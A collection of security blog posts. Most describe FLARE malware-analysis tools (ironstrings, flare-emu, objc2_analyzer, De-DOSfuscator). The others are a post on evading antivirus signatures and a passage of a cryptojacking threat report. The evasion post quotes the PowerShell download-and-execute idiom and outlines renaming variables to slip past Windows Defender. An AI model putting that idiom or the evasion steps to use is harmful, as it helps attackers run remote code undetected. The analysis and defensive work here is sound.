This blog post continues our Script Series where the FireEye Labs Advanced Reverse Engineering (FLARE) team shares tools to aid the malware analysis community. Today, we release ironstrings: a new IDAPython script to recover stackstrings from malware. The script leverages code emulation to overcome this common string obfuscation technique. More precisely, it makes use of our flare-emu tool, which combines IDA Pro and the Unicorn emulation engine. In this blog post, I explain how our new script uses flare-emu to recover stackstrings from malware. In addition, I discuss flare-emu’s event hooks and how you can use them to easily adapt the tool to your own analysis needs.

Introduction

Analyzing strings in binary files is an important part of malware analysis. Although simple, this reverse engineering technique can provide valuable information about a program’s use and its capabilities. This includes indicators of compromise like file paths and domain names. Especially during advanced analysis, strings are essential to understand a disassembled program’s functionality. Malware authors know this, and string obfuscation is one of the most common anti-analysis techniques reverse engineers encounter.

Due to the prevalence of obfuscated strings, the FLARE team has already developed and shared various tools and techniques to deal with them. In 2014 we published an IDA Pro plugin to automate the recovery of constructed strings in malware. In 2016, we released FLOSS; a standalone open-source tool to automatically identify and decode strings in malware.

Both solutions rely on vivisect, a Python-based program analysis and emulation framework. Although vivisect is a robust tool, it may fail to completely analyze an executable file or emulate its code correctly. And just like any tool, vivisect is susceptible to anti-analysis techniques. With missing, incomplete, or erroneous processing by vivisect, dependent tools cannot provide the best results. Moreover, vivisect does not provide an easy-to-use graphical interface to interactively change and enhance program analysis.

I encountered all these shortcomings recently, when I analyzed a GandCrab ransomware sample (version 5.0.4, SHA256 hash: 72CB1061A10353051DA6241343A7479F73CB81044019EC9A9DB72C41D3B3A2C7). The malware contains various anti-analysis techniques to hinder disassembly and control-flow analysis. Before I could perform any efficient reverse engineering in IDA Pro, I had to overcome these hurdles. I used IDAPython to remove various anti-analysis instruction patterns which then allowed the disassembler to successfully identify all functions in the binary. Many of the recovered functions contained obfuscated strings. Unfortunately, my changes did not propagate to vivisect, because it performs its own independent analysis on the original binary. Consequently, vivisect still failed to recognize most functions correctly and I couldn’t use one of our existing solutions to recover the obfuscated strings.

While I could have tried to feed my patches in IDA Pro back to vivisect or to create a modified binary, I instead created a new IDAPython script that does not depend on vivisect. Thus, circumventing the mentioned shortcomings. It uses IDA Pro’s program analysis and Unicorn’s emulation engine. The easy integration of these two tools is powered by flare-emu.

Using IDA Pro instead of vivisect resolves multiple limitations of our previous implementations. Now changes that users make in their IDB file, e.g. by patching instructions to manually enhance analysis, are immediately available during emulation. Moreover, the tool more robustly supports different architectures including x86, AMD64, and ARM.

Stackstrings: An Example

The disassembly listing in Figure 1 shows an example string obfuscation from the sample I analyzed. The malware creates a string at run-time by moving each character into adjacent stack addresses (gray highlights). Finally, the sample passes the string’s starting offset as an argument to the InternetOpen API call (blue highlight). Manually following these memory moves and restoring strings by hand is a very cumbersome process. Especially if malware complicates value assignments using additional instructions like illustrated below.


Figure 1: Disassembly listing showing stackstring creation and usage

Because malware often uses stack memory to create such strings, Jay Smith coined the term stackstrings for this anti-analysis technique. Note that malware can also construct strings in global memory. Our new script handles both cases; strings constructed on the stack and in global memory.

ironstrings: Stackstring Recovery Using flare-emu

The new IDAPython script is an evolution of our existing solutions. It combines FLOSS’s stackstring recovery algorithm and functionality from our IDA Pro plugin. The script relies on IDA Pro’s program analysis and emulates code using Unicorn. The combination of both tools is powered by flare-emuFe, short for flare-emu, is the chemical symbol for iron and hence the script is named ironstrings.

To recover stackstrings, ironstrings enumerates all disassembled functions in a program except for library and thunk functions as identified by IDA Pro. For each function, the script emulates various code paths through the function and searches for stackstrings based on two heuristics:

  1. Before all call instructions in the function. As stackstrings are often constructed and then passed to other functions, i.e. Windows APIs like CreateFile or InternetOpenUrl.
  2. At the end of a basic block containing more than five memory writes. The number of memory writes is configurable. This heuristic is helpful if the same memory buffer is used multiple times in a function and if the string construction spans multiple basic blocks.

If any of these conditions apply, the script searches the function’s current stack frame for printable ASCII and UTF-16 strings. To detect strings in global memory, the script additionally searches for strings in all memory locations that have been written to.

Using flare-emu Hooks to Recover Stackstrings

If you’re not already familiar with flare-emu, I recommend reading our previous blog post. It discusses some of the interfaces the tool provides. Other helpful resources are the examples and the project documentation available on the flare-emu GitHub.

The stackstrings script uses flare-emu’s iterateAllPaths API. The function iterates multiple code paths through a function. It first finds possible paths from function start to function end. The tool then forces the emulation down all identified code paths independent from the actual program state. This extensive code coverage allows ironstrings to recover strings constructed from many different emulation runs.

A key feature of flare-emu are the various hook functions that get triggered by different emulation events. These hooks, or callbacks, enable the development of very powerful automation tasks. The available hooks are a combination of Unicorn’s standard hooks, e.g., to hook memory access events, and multiple convenience hooks provided by flare-emu. The following section briefly describes the available callbacks in flare-emu and illustrates how the ironstrings script uses them to recover obfuscated strings.

  • instructionHook: This Unicorn standard hook is triggered before an instruction is emulated. ironstrings uses this hook to initiate the stackstrings extraction if a basic block contained enough memory writes, for example.
  • memAccessHook: This Unicorn standard hook is triggered when memory read or write events occur during emulation. In the stackstrings script this function stores data about all memory writes.
  • callHook: This flare-emu hook is activated before each function call. The hook’s return value is ignored. In the stackstrings script this hook triggers the extraction of stackstrings.
  • preEmuCallback: This flare-emu hook is called before each emulation run. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. ironstrings does not use this hook.
  • targetCallback: This flare-emu hook gets called whenever one of the specified target addresses is hit. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. The stackstrings script does not use this hook.

The code in Figure 2 shows the callback functions that flare-emu’s API currently supports, their signatures, and examples of how to use them. All callbacks receive an argument named hookData. This named dictionary allows the user to provide application specific data to use before, during, and after emulation. Often, this dictionary is named userData in the user-defined callbacks, as in the examples below, due to its naming in Unicorn. ironstrings uses this to access function analysis data and store recovered strings across its various hooks. The dictionary also provides access to the EmuHelper object and emulation meta data.


Figure 2: flare-emu example hook implementations

Installation

Download and install flare-emu as described at the GitHub installation pageironstrings is available, along with our other IDA Pro plugins and scripts, at our ironstrings GitHub page.

Note that both flare-emu and ironstrings were written using the new IDAPython API available in IDA Pro 7.0 and higher. They are not backwards compatible with previous program versions.

Usage and Options

To run the script in IDA Pro, go to File – Script File... (ALT+F7) and select ironstrings.py. The script runs automatically on all functions, prints its results to IDA Pro's output window, and adds comments at the locations where it recovered stackstrings. Figure 3 shows the script’s output of the recovered stackstring locations from the GandCrab sample. Analysis of this malware takes the script about 15 seconds.


Figure 3: Deobfuscated stackstrings and locations where they were identified

Figure 4 shows the disassembly listing of the stackstring creation example discussed at the beginning of this post after running ironstrings.


Figure 4: Commented stackstring after running ironstrings

After analyzing a sample, the script provides a summary and a unique listing of all recovered strings. The output for the ransomware sample is shown in Figure 5. Here the tool failed to analyze two functions due to invalid memory operations during Unicorn’s code emulation.


Figure 5: Script summary and unique string listing

Note that you can modify various options to change the script’s behavior. For example, you can configure the output format at the top of the ironstrings.py file. The script’s README file explains the options in more detail.

Conclusion

This blog post explains how our new IDAPython script ironstrings works and how you can use it to automatically recover stackstrings in IDA Pro. Overcoming anti-analysis techniques is just one of many useful applications of code emulation for malware analysis. This post shows that flare-emu provides the ideal base for this by integrating IDA Pro and Unicorn. The detailed discussion of flare-emu’s hook functions will help you to write your own powerful automation scripts. Please reach out to us with questions, suggestions and feedback via the flare-emu and flare-ida GitHub issue trackers.

FLARE Script Series: Automating Objective-C Code Analysis with Emulation

12 December 2018 at 17:30

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing a new IDAPython library – flare-emu – powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers. Along with this library, we are also sharing an Objective-C code analysis IDAPython script that uses it. Read on to learn some creative ways that emulation can help solve your code analysis problems and how to use our new IDAPython library to save you lots of time in the process.

Why Emulation?

If you haven’t employed emulation as a means to solve a code analysis problem, then you are missing out! I will highlight some of its benefits and a few use cases in order to give you an idea of how powerful it can be. Emulation is flexible, and many emulation frameworks available today, including Unicorn, are cross-platform. With emulation, you choose which code to emulate and you control the context under which it is executed. Because the emulated code cannot access the system services of the operating system under which it is running, there is little risk of it causing damage. All of these benefits make emulation a great option for ad-hoc experimentation, problem solving, or automation.

Use Cases

  • Decoding/Decryption/Deobfuscation/Decompress – Often during malicious code analysis you will come across a function used to decode, decompress, decrypt, or deobfuscate some useful data such as strings, configuration data, or another payload. If it is a common algorithm, you may be able to identify it by sight or with a plug-in such as signsrch. Unfortunately, this is not often the case. You are then left to either opening up a debugger and instrumenting the sample to decode it for you, or transposing the function by hand into whatever programming language fits your needs at the time. These options can be time consuming and problematic depending on the complexity of the code and the sample you are analyzing. Here, emulation can often provide a preferable third option. Writing a script that emulates the function for you is akin to having the function available to you as if you wrote it or are calling it from a library. This allows you to reuse the function as many times as it’s needed, with varying inputs, without having to open a debugger. This case also applies to self-decrypting shellcode, where you can have the code decrypt itself for you.
  • Data Tracking – With emulation, you have the power to stop and inspect the emulation context at any time using an instruction hook. Pairing a disassembler with an emulator allows you to pause emulation at key instructions and inspect the contents of registers and memory. This allows you to keep tabs on interesting data as it flows through a function. This can have several applications. As previously covered in other blogs in the FLARE script series, Automating Function Argument Extraction and Automating Obfuscated String Decoding, this technique can be used to track the arguments passed to a given function throughout an entire program. Function argument tracking is one of the techniques employed by the Objective-C code analysis tool introduced later in this post. The data tracking technique could also be employed to track the this pointer in C++ code in order to markup object member references, or the return values from calls to GetProcAddress/dlsym in order to rename the variables they are stored in appropriately. There are many possibilities.

Introducing flare-emu

The FLARE team is introducing an IDAPython library, flare-emu, that marries IDA Pro’s binary analysis capabilities with Unicorn’s emulation framework to provide the user with an easy to use and flexible interface for scripting emulation tasks. flare-emu is designed to handle all the housekeeping of setting up a flexible and robust emulator for its supported architectures so that you can focus on solving your code analysis problems. It currently provides three different interfaces to serve your emulation needs, along with a slew of related helper and utility functions.

  1. emulateRange – This API is used to emulate a range of instructions, or a function, within a user-specified context. It provides options for user-defined hooks for both individual instructions and for when “call” instructions are encountered. The user can decide whether the emulator will skip over, or call into function calls. Figure 1 shows emulateRange used with both an instruction and call hook to track the return value of GetProcAddress calls and rename global variables to the name of the Windows APIs they will be pointing to. In this example, it was only set to emulate from 0x401514 to 0x40153D.  This interface provides an easy way for the user to specify values for given registers and stack arguments. If a bytestring is specified, it is written to the emulator’s memory and the pointer is written to the register or stack variable. After emulation, the user can make use of flare-emu’s utility functions to read data from the emulated memory or registers, or use the Unicorn emulation object that is returned for direct probing in case flare-emu does not expose some functionality you require.

    A small wrapper function for emulateRange, named emulateSelection, can be used to emulate the range of instructions currently highlighted in IDA Pro.


    Figure 1: emulateRange being used to track the return value of GetProcAddress

  2. iterate – This API is used to force emulation down specific branches within a function in order to reach a given target. The user can specify a list of target addresses, or the address of a function from which a list of cross-references to the function is used as the targets, along with a callback for when a target is reached. The targets will be reached, regardless of conditions during emulation that may have caused different branches to be taken. Figure 2 illustrates a set of code branches that iterate has forced to be taken in order to reach its target; the flags set by the cmp instructions are irrelevant.  Like the emulateRange API, options for user-defined hooks for both individual instructions and for when “call” instructions are encountered are provided. An example use of the iterate API is for the function argument tracking technique mentioned earlier in this post.


    Figure 2: A path of emulation determined by the iterate API in order to reach the target address

  3. emulateBytes – This API provides a way to simply emulate a blob of extraneous shellcode. The provided bytes are not added to the IDB and are simply emulated as is. This can be useful for preparing the emulation environment. For example, flare-emu itself uses this API to manipulate a Model Specific Register (MSR) for the ARM64 CPU that is not exposed by Unicorn in order to enable Vector Floating Point (VFP) instructions and register access. Figure 3 shows the code snippet that achieves this. Like with emulateRange, the Unicorn emulation object is returned for further probing by the user in case flare-emu does not expose some functionality required by the user.


    Figure 3: flare-emu using emulateBytes to enable VFP for ARM64

API Hooking

As previously stated, flare-emu is designed to make it easy for you to use emulation to solve your code analysis needs. One of the pains of emulation is in dealing with calls into library functions. While flare-emu gives you the option to simply skip over call instructions, or define your own hooks for dealing with specific functions within your call hook routine, it also comes with predefined hooks for over 80 functions! These functions include many of the common C runtime functions for string and memory manipulation that you will encounter, as well as some of their Windows API counterparts.

Examples

Figure 4 shows a few blocks of code that call a function that takes a timestamp value and converts it to a string. Figure 5 shows a simple script that uses flare-emu’s iterate API to print the arguments passed to this function for each place it is called. The script also emulates a simple XOR decode function and prints the resulting, decoded string. Figure 6 shows the resulting output of the script.


Figure 4: Calls to a timestamp conversion function


Figure 5: Simple example of flare-emu usage


Figure 6: Output of script shown in Figure 5

Here is a sample script that uses flare-emu to track return values of GetProcAddress and rename the variables they are stored in accordingly. Check out our README for more examples and help with flare-emu.

Introducing objc2_analyzer

Last year, I wrote a blog post to introduce you to reverse engineering Cocoa applications for macOS. That post included a short primer on how Objective-C methods are called under the hood, and how this adversely affects cross-references in IDA Pro and other disassemblers. An IDAPython script named objc2_xrefs_helper was also introduced in the post to help fix these cross-references issues. If you have not read that blog post, I recommend reading it before continuing on reading this post as it provides some context for what makes objc2_analyzer particularly useful. A major shortcoming of objc2_xrefs_helper was that if a selector name was ambiguous, meaning that two or more classes implement a method with the same name, the script was unable to determine which class the referenced selector belonged to at any given location in the binary and had to ignore such cases when fixing cross-references.

Now, with emulation support, this is no longer the case. objc2_analyzer uses the iterate API from flare-emu along with instruction and call hooks that perform Objective-C disassembly analysis in order to determine the id and selector being passed for every call to objc_msgSend variants in a binary. As an added bonus, it can also catch calls made to objc_msgSend variants when the function pointer is stored in a register, which is a very common pattern in Clang (the compiler used by modern versions of Xcode). IDA Pro tries to catch these itself and does a pretty good job, but it doesn’t catch them all. In addition to x86_64, support was also added for the ARM and ARM64 architectures in order to support reverse engineering iOS applications. This script supersedes the older objc2_xrefs_helper script, which has been removed from our repo. And, since the script can perform such data tracking in Objective-C code by using emulation, it can also determine whether an id is a class instance or a class object itself. Additional support has been added to track ivars being passed as ids as well. With all this information, Objective-C-style pseudocode comments are added to each call to objc_msgSend variants that represent the method call being made at each location. An example of the script’s capability is shown in Figure 7 and Figure 8.


Figure 7: Objective-C IDB snippet before running objc2_analyzer


Figure 8: Objective-C IDB snippet after running objc2_analyzer

Observe the instructions referencing selectors have been patched to instead reference the implementation function itself, for easy transition. The comments added to each call make analysis much easier. Cross-references from the implementation functions are also created to point back to the objc_msgSend calls that reference them as shown in Figure 9.


Figure 9: Cross-references added to IDB for implementation function

It should be noted that every release of IDA Pro starting with 7.0 have brought improvements to Objective-C code analysis and handling. However, at the time of writing, the latest version of IDA Pro being 7.2, there are still shortcomings that are mitigated using this tool as well as the immensely helpful comments that are added. objc2_analyzer is available, along with our other IDA Pro plugins and scripts, at our GitHub page.

Conclusion

flare-emu is a flexible tool to include in your arsenal that can be applied to a variety of code analysis problems. Several example problems were presented and solved using it in this blog post, but this is just a glimpse of its possible applications. If you haven’t given emulation a try for solving your code analysis problems, we hope you will now consider it an option. And for all, we hope you find value in using these new tools!

Cmd and Conquer: De-DOSfuscation with flare-qdb

20 November 2018 at 17:30

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on the FLARE malware queue.

Previously, I released flare-qdb, which is a command-line and Python-scriptable debugger based on Vivisect. I previously wrote about how to use flare-qdb to instrument and modify malware behavior. Flare-qdb also made a guest appearance in Austin Baker and Jacob Christie’s SANS DFIR Summit 2017 briefing, inducing the Windows event log service to exclude process creation events. In this blog post, I will show how I used flare-qdb to bring “script block logging” to the Windows command interpreter. I will also share an Easter Egg that I found by flipping only a single bit in the process address space of cmd.exe. Finally, I will share the script that I added to flare-qdb so you can de-obfuscate malicious command scripts yourself by executing them (in a safe environment, of course). But first, I’ll talk about the analysis that led me to this solution.

At First Glance

Figure 1 shows a batch script (MD5 hash 6C8129086ECB5CF2874DA7E0C855F2F6) that has been obfuscated using the BatchEncryption tool referenced in Daniel Bohannon’s paper. This file does not appear in VirusTotal as of this writing, but its dropper does (the MD5 hash is ABD0A49FDA67547639EEACED7955A01A). My goal was to de-obfuscate this script and report on what the attacker was doing.


Figure 1: Contents of XYNT.bat

This 165k batch file is dropped as C:\Windows\Temp\XYNT.bat and executed by its dropper. Its commands are built from environment variable substrings. Figure 2 shows how to use the ECHO command to decode the first command.


Figure 2: Partial command decoding via the ECHO command

The script uses hundreds of commands to set environment variables that are ultimately expanded to de-obfuscate malicious commands. A tedious approach to de-obfuscating this script would be to de-fang each command by prepending an ECHO statement to print each de-obfuscated command to the console. Unfortunately, although the ECHO command can “decode” each command, BatchEncryption needs the SET commands to be executed to decode future commands. To decode this script while allowing the full malicious functionality to run as expected, you would have to iteratively and carefully echo and selectively execute a few hundred obfuscated SET commands.

The irony of BatchEncryption is that batch scripts are viewed as being easy to de-obfuscate, making binary code the safer place to hide logic from the prying eyes of network defenders. But BatchEncryption adds a formidable barrier to analysis by its extensive, layered use of environment variables to rebuild the original commands.

Taking Cmd of the Situation

I decided to see if it would be easier to instrument cmd.exe to log commands rather than de-obfuscating the script myself. To begin, I debugged cmd.exe, set a breakpoint on CreateProcessW, and executed a program from the command prompt. Figure 3 shows the call stack for CreateProcessW as cmd.exe executes notepad.


Figure 3: Call stack for CreateProcessW in cmd.exe

Starting from cmd!ExecPgm, I reviewed the disassembly of the above functions in cmd.exe to trace the origin of the command string up the call stack. I discovered cmd!Dispatch, which receives not a string but a structure with pointers to the command, arguments, and any I/O redirection information (such as redirecting the standard output or error streams of a program to a file or device). Testing revealed that these strings had all their environment variables expanded, which means we should be able to read the de-obfuscated commands from here.

Figure 4 is an exploration of this structure in WinDbg after running the command "echo hai > nul". This command prints the word hai to the standard output stream but uses the right-angle bracket to redirect standard output to the NUL device, which discards all data. The orange boxes highlight non-null pointers that got my attention during analysis, and the arrows point to the commands I used to discover their contents.


Figure 4: Exploring the interesting pointers in 2nd argument to cmd!Dispatch

Because users can redirect multiple I/O streams in a single command, cmd.exe represents I/O redirection with a linked list. For example, the command in Listing 1 shows redirection of standard output (stream #1 is implicit) to shares.txt and standard error (stream #2 is explicitly referenced) to errors.txt.

net use > shares.txt 2>errors.txt

Listing 1: Command-line I/O redirection example

Figure 5 shows the command data structure and the I/O redirection linked list in block diagram format.


Figure 5: Command data structure diagram

By inspection, I found that cmd!Dispatch is responsible for executing both shell built-ins and executable programs, so unlike breaking on CreateProcess, it will not miss commands that do not result in process creation. Based on these findings, I wrote a flare-qdb script to parse and dump commands as they are executed.

Introducing De-DOSfuscator

De-DOSfuscator uses flare-qdb and Vivisect to hook the Dispatch function in cmd.exe and parse commands from memory. The De-DOSfuscator script runs in a 64-bit Python 2 interpreter and dumps commands to both the console and a log file. The script comes with the latest version of flare-qdb and is installed as a Python entry point named dedosfuscator.exe.

De-DOSfuscator relies on the location of the non-exported Dispatch function to log commands, and its location varies per system. For convenience, if an Internet connection is available, De-DOSfuscator automatically retrieves this function’s offset using Microsoft’s symbol server. To allow offline use, you can supply the path to a copy of cmd.exe from your offline machine to the --getoff switch to obtain this offset. You can then supply that output as the argument to the --useoff switch in your offline machine to inform De-DOSfuscator where the function is located. Alternately, you can use De-DOSfuscator with a downloaded PDB or a local symbol cache containing the correct symbols.

Figure 6 demonstrates getting and using the offset in a single session. Note that for this to work in an isolated VM, you would instead specify the path to a copy of the guest’s command interpreter specific to that VM.


Figure 6: Getting and using offsets and testing De-DOSfuscator

This works great on the BatchEncrypted script in Figure 1. Let’s have a look.

Results

Figure 7 shows the log created by De-DOSfuscator after running XYNT.bat. Hundreds of lines of SET statements progressively build environment variables for composing further commands. Keen eyes will also note a misspelling of the endlocal command-line extension keyword.


Figure 7: Beginning of dumped commands

These environment variable manipulations give way to real commands as shown in Figure 8. One of the script’s first actions is to use reg.exe to check the NUMBER_OF_PROCESSORS environment variable. This analysis system only had one vCPU, which can be seen in the set "a=1" output on line 620. After this, the script executes goto del, which branches to a batch label that ultimately deletes the script and other dropped files.


Figure 8: Anti-sandbox measure

This is a batch-oriented spin on a common sandbox evasion trick. It works because many malware analysis sandboxes run with a single CPU to minimize hypervisor resources, whereas most modern systems have at least two CPU cores. Now that we can easily read the script’s commands, it is trivial to circumvent this evasion by, for example, increasing the number of vCPUs available to the VM. Figure 9 shows De-DOSfuscator log after inducing the rest of the code to run.


Figure 9: After circumventing anti-sandbox measure

XYNT.bat calls a dropped binary to create and start a Windows service for persistence. The largest dropped binary is a variant of the XMRig cryptocurrency miner, and many of the services and executables referenced by the script also appear to be cryptocurrency-related.

Happy Easter

Easter is a long way off, but I must present you with a very early Easter Egg because it is such a neat little find. During my journey through cmd.exe, I noticed a variable named fDumpParse having only one cross-reference that seemed to control an interesting behavior. The lone cross-reference and the relevant code are shown in Figure 10. Although fDumpParse is inaccessible anywhere else in the code, it controls whether a function is called to dump information about the command that has been parsed.


Figure 10: fDumpParse evaluation and cross-refs (EDI is NULL)

To experiment with this, you can use De-DOSfuscator’s --fDumpParse switch. You will then be greeted with a command prompt that is more transparent about what it has parsed. Figure 11 shows an example along with a graphical representation of the abstract syntax tree (AST) of parsed command tokens.


Figure 11: Command interpreter with fDumpParse set

Microsoft probably inserted the fDumpParse flag so developers could debug issues with cmd.exe. Unfortunately, as nifty as this is, it has drawbacks for bulk de-obfuscation:

  • This output is harder to read than plain commands, because it dumps the tree in preorder traversal rather than inorder like it was typed.
  • Output copied from the console may contain extraneous line breaks depending on the console host program’s text wrapping behavior.
  • Scrolling in the command interpreter to read or copy output can be tedious.
  • The console buffer is limited, so not everything may be captured.
  • Malicious script authors can still use the CLS command to clear the screen and make all the fDumpParse output disappear.
  • Gratuitous joining of commands with command separators (as found in XYNT.bat) yields unreadable ASTs that exceed the console width and wrap around, as in Figure 12.


Figure 12: fDumpParse result exceeding console width

Consequently, fDumpParse is not ideal for de-obfuscating large, malicious batch files; however, it is still interesting and useful for de-obfuscating short scripts or one-off commands. You can get the offset De-DOSfuscator needs for offline use via --getoff and use it via --useoff, as with normal operation.

Wrapping Up

I have given you an example of a heavily obfuscated command script and I have shared a useful tool for de-obfuscating it, along with the analytical steps that I followed to synthesize it. The De-DOSfuscator script code comes with the latest version of flare-qdb and is accessible as a script entry point (dedosfuscator.exe) when you install flare-qdb. It is my hope that this not only helps you to conveniently analyze malicious batch scripts, but also inspires you to devise your own creative ways to employ flare-qdb against malware.

Bypassing Antivirus for Your Antivirus Bypass

13 September 2018 at 23:00

Chances are you have heard about how easy it can be to evade antivirus. Often, this is because the signatures used by vendors are too simplistic and can be successfully duped without changing the functionality of the malware. Have you ever attempted to evade AV? Is it really that easy? In this blog post, I’ll show you how I adapted “malicious” (not really) PowerShell script to slip by Windows Defender.

One of my favorite PowerShell commands is iex (new-objectnet.webclient).downloadstring, which can be used to load a remotely hosted script directly into memory. This command is often behind reports of “fileless” malware and is regularly abused by red teams and criminals alike. AV detection of this method has improved somewhat recently but plenty of options exist to evade, such as invoke-obfuscation by @danielhbohannon.

The MITRE ATT&CK framework includes a technique called “Indicator Removal from Tools” (T1066), which describes how an adversary may alter a tool after it is detected in an attempt to evade defenses. T1066 is one reason why alerts for a tool being blocked should not be ignored. In researching this technique, I found that using my favorite command with PowerSploit’s Find-AVSignature.ps1 somewhat ironically resulted in a Windows Defender block… not-so-ironically, it was released in 2012.

There have been many excellent posts on how to evade AV but, as the saying goes, “there is more than one way to skin a cat.”  To highlight how ridiculous AV can be, I decided to bypass AV detection of Find-AVSignature.ps1 while maintaining the spirit of “there is an easier way,” outlined in @obscuresec’s blog post introducing Find-AvSignature.

The key to my method is PowerShell’s built-in Invoke-Webrequest command (also known by the aliases "iwr," "wget," and "curl"). While Windows Defender will block calling Find-AvSignature.ps1 when attempting to use iex (new-object net.webclient).downloadstring…

...it will NOT block you from performing a wget on the page and then viewing the page’s content.

Now we’re getting somewhere, but we can’t simply write the contents to disk. From here, we are going to find out where Defender is catching the file by writing the file to the disk one line at a time. After we find the line, we are going to break it into words and then reverse any variables found in the line. This will require a fairly simple script:

From the output of the script, we can see that detection takes place on line 166 (167 for non-programmer types), which reads:

$BytesLeft = $BytesLeft - $count

Surely, we can't change the variable names!

We could simply do a $page.content.replace twice to replace the two variables but why would we when we can over-complicate this? Let’s add logic to change the variable names for us by simply reversing the characters.

Now the output reads:

Detection at line 166 (counting from 0 ^,^)

Replaced $BytesLeft with $tfeLsetyB

Replaced $count with $tnuoc

But does Find-AvSignature.ps1 still work? Yes, yes it does….

So, is this only Windows Defender sucking? No, no it is not…

As you can see, it’s not only Windows Defender that is using a poorly chosen detection string – our small change detection went across several AV products. This begs some questions: How well does AV hold up to other techniques? Is that ok because you are covered elsewhere? More expansively, how well does your firewall, IDS/IPS, and Sandbox hold up? Could you adjust your defense strategy to compensate? Before you invest in another security tool to layer over the tons that you probably already have, ask yourself if it’s really the product or a change in configuration that is needed.

Verodin SIP prescriptively shows you exactly what change you should make to optimize your security, so you can find solutions with what you already have in your network. To learn more, request a demo.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

18 July 2018 at 14:00

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

